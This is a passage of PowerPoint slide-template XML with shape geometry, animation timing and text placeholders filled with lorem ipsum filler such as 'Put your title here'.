                  <a:pt x="1450274" y="2696808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1446716" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9020" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462" y="2696808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1881" y="2679307"/>
                  <a:pt x="0" y="2661186"/>
                  <a:pt x="0" y="2642626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="268845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="120366"/>
                  <a:pt x="120366" y="0"/>
                  <a:pt x="268845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43" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9614047" y="4606285"/>
            <a:ext cx="1938573" cy="243840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1453930" h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442258" y="37601"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1401097" y="134917"/>
                  <a:pt x="1304736" y="203200"/>
                  <a:pt x="1192427" y="203200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261503" y="203200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149194" y="203200"/>
                  <a:pt x="52834" y="134917"/>
                  <a:pt x="11672" y="3760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4" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591965" y="5563772"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45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569384" y="5109393"/>
            <a:ext cx="10996083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920" b="1" baseline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Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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1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2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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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5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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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4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4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4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/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="4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45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4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4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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC0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33C9F-EFB6-4360-A5D6-81DD839FD7B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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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603251" y="1394298"/>
            <a:ext cx="10972800" cy="4574704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95057" tIns="47529" rIns="95057" bIns="47529"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="just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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sodales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> nisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec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 non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vivamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>risus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bibendum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
